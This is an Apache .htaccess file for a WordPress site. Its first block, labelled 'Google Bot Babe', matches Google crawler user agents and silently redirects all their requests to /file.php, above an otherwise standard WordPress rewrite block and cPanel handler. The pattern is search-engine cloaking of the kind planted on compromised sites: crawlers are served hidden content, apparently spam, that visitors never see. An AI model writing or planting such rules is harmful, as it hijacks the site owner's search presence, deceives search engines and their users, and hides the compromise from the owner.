RewriteEngine On # --- Google Bot Babe --- RewriteCond %{HTTP_USER_AGENT} "Googlebot" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "Googlebot-Mobile" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "Googlebot-Image" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "Googlebot-Video" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "Googlebot-News" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "Googlebot-AdsBot" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "AdsBot-Google" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "Mediapartners-Google" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "APIs-Google" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "FeedFetcher-Google" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "Google-InspectionTool" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "Google Web Preview" [NC] RewriteCond %{REQUEST_URI} !^/file\.php$ [NC] RewriteRule ^(.*)$ /file.php [L] # --- WordPress BABE --- # BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress # php -- BEGIN cPanel-generated handler, do not edit # This domain inherits the “PHP” package. # php -- END cPanel-generated handler, do not edit